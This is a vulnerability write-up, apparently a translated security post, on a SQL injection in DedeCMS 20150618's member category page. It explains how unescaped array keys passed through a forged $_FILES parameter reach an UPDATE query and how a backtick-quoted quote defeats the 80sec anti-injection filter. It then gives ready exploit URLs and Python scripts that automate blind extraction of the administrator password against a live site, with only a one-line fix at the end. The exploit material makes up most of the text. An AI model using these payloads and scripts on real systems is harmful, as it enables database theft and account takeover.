DedeCMS 20150618 SQL injection (bypasses the anti-injection filter; the administrator account can be extracted)
First, take a look at XSSClean:

```php
function XSSClean($val)
{
    global $cfg_soft_lang;

    if ($cfg_soft_lang == 'gb2312') gb2utf8($val);

    if (is_array($val))
    {
        while (list($key) = each($val))
        {
            if (in_array($key, array('tags', 'body', 'dede_fields', 'dede_addonfields', 'dopost', 'introduce')))
            {
                continue;
            }
            // only the value is cleaned; the key is left alone (and the key is never addslashes'd either)
            $val[$key] = XSSClean($val[$key]);
        }
        return $val;
    }

    // strip non-printable characters (CR, LF and TAB are kept)
    $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);

    // undo numeric entity encodings of ordinary characters
    $search  = 'abcdefghijklmnopqrstuvwxyz';
    $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $search .= '1234567890!@#$%^&*()';
    $search .= '~`";:?+/={}[]-_|\'\\';
    for ($i = 0; $i < strlen($search); $i++)
    {
        // &#x0040; style (hex); padded zeros and the ; are optional
        $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val);
        // &#00064; style (decimal)
        $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val);
    }

    $val = str_replace("`", "&#96;", $val);
    $val = str_replace("'", "&#39;", $val);
    $val = str_replace('"', "&quot;", $val);
    $val = str_replace("<", "&lt;", $val);
    $val = str_replace(">", "&gt;", $val);
    $val = str_replace("(", "&#40;", $val);
    $val = str_replace(")", "&#41;", $val);

    return $val;
}
```
member/mtypes.php:

```php
else if ($dopost == 'save')
{
    if (isset($mtypeidarr) && is_array($mtypeidarr))
    {
        $delids = '0';
        $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
        foreach ($mtypeidarr as $delid)
        {
            $delid = HtmlReplace($delid);
            $delids .= ','.$delid;
            unset($mtypename[$delid]);
        }
        $query = "DELETE FROM `dede_mtypes` WHERE mtypeid IN ($delids) AND mid='$cfg_ml->M_ID';";
        $dsql->ExecuteNoneQuery($query);
    }

    foreach ($mtypename as $id => $name)   // iterates the keys of the array
    {
        // only the value is addslashes'd / HtmlReplace'd; the key never is,
        // so $id can carry a single quote into the query: injection
        $name = HtmlReplace($name);
        $query = "UPDATE `dede_mtypes` SET mtypename='$name' WHERE mtypeid='$id' AND mid='$cfg_ml->M_ID'";
        $dsql->ExecuteNoneQuery($query);
    }
    ShowMsg('Category update complete', 'mtypes.php');
}
```
So first we register an account and then pass an array, since DedeCMS emulates register_globals.
It turns out we cannot pass the array directly, though: with mtypename[aa'] a var_dump shows an array, but the key that comes out of the loop does not arrive intact.
Another route is needed here; I borrowed menmen519's method of passing an array.
```php
$keyarr = array('name', 'type', 'tmp_name', 'size');   // defined just above this loop in uploadsafe.inc.php
foreach ($_FILES as $_key => $_value)
{
    foreach ($keyarr as $k)
    {
        if (!isset($_FILES[$_key][$k]))
        {
            exit('Request Error!');
        }
    }
    if (preg_match('#^(cfg_|GLOBALS)#', $_key))
    {
        exit('Request var not allow for uploadsafe!');
    }
    // $mtypename = $_FILES['mtypename']['tmp_name']: an array whose keys are exactly as sent
    $$_key = $_FILES[$_key]['tmp_name'];
    ${$_key.'_name'} = $_FILES[$_key]['name'];
    ${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
    ${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#', '', $_FILES[$_key]['size']);
    // $cfg_not_allowall is the configured list of forbidden upload extensions
    if (!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i", ${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})))
    {
        // upload rejected here (remainder of the file not shown)
    }
}
```

So the array is built through $_FILES: because the request variables are registered as globals and the name _FILES is not blocked, the whole $_FILES structure can be supplied in the query string, and uploadsafe.inc.php copies its tmp_name member into $mtypename with the keys untouched.
Another problem: the anti-injection check has changed as well.

```php
if (strpos($clean, '@') !== FALSE OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE OR strpos($clean,'$s$$s$')!== FALSE)
```

The double quote is now rejected too. Everyone knows that against the 80sec IDS the keyword could be placed after `` @`'` ``.
But with neither `@` nor `"` available, how do we keep a bare `` `'` `` from raising a MySQL error before we get to embed the select statement?
Without overthinking it, I wrote a crude fuzz script and ran it:

```php
";echo $b;echo "";echo urlencode($b);}}
```

Only `@` came out. I changed the script and ran it again:

```php
";echo $b;echo "";echo urlencode($b);}}
```

Only the double quote came out. Both of those are exactly what is now filtered.
Fortunately there is this construct:

```sql
WHERE mtypeid='a' and `'`.``.mtypeid and
```

This also executes: a backtick-quoted identifier may contain a single quote, and with the empty table qualifier MySQL still resolves `` `'`.``.mtypeid `` to the column mtypeid. The anti-injection, on the other hand, takes the `'` inside the backticks as the start of a string literal, so everything up to the next quote, including the select and the comment, is collapsed into a "string" that contains neither `@` nor `"`.
So DedeCMS's anti-injection is bypassed, and the injection goes through.
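To make the bypass concrete, here is an added example (mine, not code from the page or from DedeCMS) that models the filter. `collapse_strings` is my transcription of the quote-pairing loop in CheckSql() from include/dedesql.class.php: every single-quoted literal becomes the token `$s$`, a backslash skips the following character, and the keyword checks run on the lower-cased, whitespace-normalised result. The union, comment and sub-select rules are from that same function as I recall it and are not quoted on the page; the last rule is the line quoted above. The rule names, the sample `mid` value and the three candidate keys are mine.

```python
import re

# Model of DedeCMS CheckSql() (the "80sec" anti-injection), transcribed by hand.
def collapse_strings(db_string):
    """Replace every single-quoted literal with $s$, then normalise."""
    clean = ""
    old_pos = 0
    pos = -1
    while True:
        pos = db_string.find("'", pos + 1)          # opening quote
        if pos == -1:
            break
        clean += db_string[old_pos:pos]
        while True:                                  # find the matching closing quote
            pos1 = db_string.find("'", pos + 1)
            pos2 = db_string.find("\\", pos + 1)
            if pos1 == -1:
                break
            if pos2 == -1 or pos2 > pos1:
                pos = pos1
                break
            pos = pos2 + 1                           # backslash: skip the escaped character
        clean += "$s$"
        old_pos = pos + 1
    clean += db_string[old_pos:]
    return re.sub(r"\s+", " ", clean).strip().lower()


def check_sql(db_string):
    """Return the rule that rejects db_string, or None when it would be executed."""
    clean = collapse_strings(db_string)
    if "union" in clean and re.search(r"(^|[^a-z])union($|[^a-z])", clean):
        return "union"
    if clean.find("/*") > 2 or "--" in clean or "#" in clean:
        return "comment"
    if re.search(r"\([^)]*?select", clean):
        return "sub-select"
    # The line added in 20150618 (quoted on the page).
    if "@" in clean or "char(" in clean or '"' in clean or "$s$$s$" in clean:
        return "20150618-additions"
    return None


def mtypes_update(key, name="w", mid="5"):
    """The UPDATE that member/mtypes.php builds from $mtypename[key] = name.
    Only the value passes through HtmlReplace; the key is interpolated raw."""
    return ("UPDATE `dede_mtypes` SET mtypename='%s' WHERE mtypeid='%s' AND mid='%s'"
            % (name, key, mid))


# Three candidate keys (constructed): a plain injection, the classic 80sec
# bypass, and the page's backtick-identifier trick.
NAIVE = "1' or (select 1)#"
OLD_80SEC = "a' and @`'` or (select 1)#"
BYPASS = ("a' and `'`.``.mtypeid or "
          "if(ascii(substr((select pwd from dede_member limit 1),1,1))=50,1,0) "
          "and mtypeid=1#")

if __name__ == "__main__":
    for label, key in (("naive", NAIVE), ("old 80sec", OLD_80SEC), ("bypass", BYPASS)):
        q = mtypes_update(key)
        print("%-10s clean=%r -> %s" % (label, collapse_strings(q), check_sql(q)))
```

The collapsed form of the bypass query is `update `dede_mtypes` set mtypename=$s$ where mtypeid=$s$ and `$s$ and mid=$s$`: the quote inside the backticks pairs with the quote that follows the `#`, so the sub-select and the comment vanish from what the filter inspects, and the `mid` check that follows the comment is discarded by MySQL.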
_______________________________________________________________________
Demo process

First, as a member, go to /member/mtypes.php and create a category.

Category added successfully. If your browser does not respond, click here...

Delete?   Category ID   Content type     Category name
          1             Common Article   www

Note that the category ID is 1 and its name is www.
Then request:

http://web/new/dedecmsv/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and `'`.``.mtypeid or if(ascii(substr((select pwd from dede_member limit 1),1,1))%3d51,1,0) and mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx

Delete?   Category ID   Content type     Category name
          1             Common Article   www

The category name has not changed.
Change the compared value:

http://web/new/dedecmsv/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and `'`.``.mtypeid or if(ascii(substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx

Back in category management after the request:

Delete?   Category ID   Content type     Category name
          1             Common Article   w

The category name has now changed to the value of our array, which means the condition "ASCII code of the first character of pwd is 50" held.
In other words, the first character of pwd is 2.
You can also write a script (for example a time-based one) to run this automatically.
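As an added example (my script, not the author's), the following automates the procedure demonstrated above: it builds the page's request, uses a fresh marker as the category name on every probe so a true condition is detectable each time, and binary-searches each character. Assumptions not stated on the page: the member's category has mtypeid 1, the caller supplies a logged-in session cookie, a `>` comparison in the array key survives unfiltered (the page only shows that the key is not escaped), and the column and table are `pwd` and `dede_member` as in the demo. `simulated_probe` is a constructed offline stand-in for the target so the script runs without a server.

```python
import itertools
import urllib.request
from urllib.parse import urlencode

# Key shape from the page's demo; the condition is substituted per probe (assumed mtypeid 1).
INJECTED_KEY = "a' and `'`.``.mtypeid or if(%s,1,0) and mtypeid=%d#"


def build_query(condition, marker, mtypeid=1):
    """Query string from the page's demo: _FILES is registered from $_GET,
    uploadsafe.inc.php copies tmp_name into $mtypename, and the unescaped
    array key lands in the UPDATE's WHERE clause."""
    key = INJECTED_KEY % (condition, mtypeid)
    return urlencode({
        "dopost": "save",
        "_FILES[mtypename][name]": ".xxxx",
        "_FILES[mtypename][type]": "xxxxx",
        "_FILES[mtypename][tmp_name][%s]" % key: marker,
        "_FILES[mtypename][size]": ".xxxx",
    })


def char_condition(position, value, column="pwd", table="dede_member"):
    """Condition that holds iff ASCII(char at position) > value (column/table assumed)."""
    return "ascii(substr((select %s from %s limit 1),%d,1))>%d" % (column, table, position, value)


def extract(probe, max_len=32):
    """Recover the value character by character; probe(condition) returns True
    when the category row was updated, i.e. when the condition held."""
    out = ""
    for position in range(1, max_len + 1):
        if not probe(char_condition(position, 0)):   # ascii('') is 0: end of string
            break
        low, high = 32, 126                           # printable ASCII range
        while low < high:
            mid = (low + high) // 2
            if probe(char_condition(position, mid)):
                low = mid + 1
            else:
                high = mid
        out += chr(low)
    return out


def http_probe_factory(base_url, cookie):
    """Real oracle: fire the injected save, then read the category list back
    and look for the unique marker written into the category name."""
    counter = itertools.count(1)

    def probe(condition):
        marker = "m%d" % next(counter)
        headers = {"Cookie": cookie}
        url = base_url + "/member/mtypes.php?" + build_query(condition, marker)
        urllib.request.urlopen(urllib.request.Request(url, headers=headers)).read()
        page = urllib.request.urlopen(
            urllib.request.Request(base_url + "/member/mtypes.php", headers=headers)).read()
        return marker.encode() in page
    return probe


def simulated_probe(secret):
    """Constructed offline stand-in for the target: parses position and
    threshold out of the condition and answers as MySQL would."""
    def probe(condition):
        position = int(condition.split("),")[1].split(",")[0])
        threshold = int(condition.rsplit(">", 1)[1])
        code = ord(secret[position - 1]) if position <= len(secret) else 0
        return code > threshold
    return probe


if __name__ == "__main__":
    print(extract(simulated_probe("2f9a")))          # constructed secret
    print(build_query(char_condition(1, 49), "m1"))
```

For a live run replace `simulated_probe(...)` with `http_probe_factory("http://web/new/dedecmsv", "PHPSESSID=...")`; every probe costs two requests (the save and the list), so a character takes about fourteen requests instead of one per candidate value as in the manual demo.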
Solution:
Run the array key through HtmlReplace as well; at present only the value is filtered.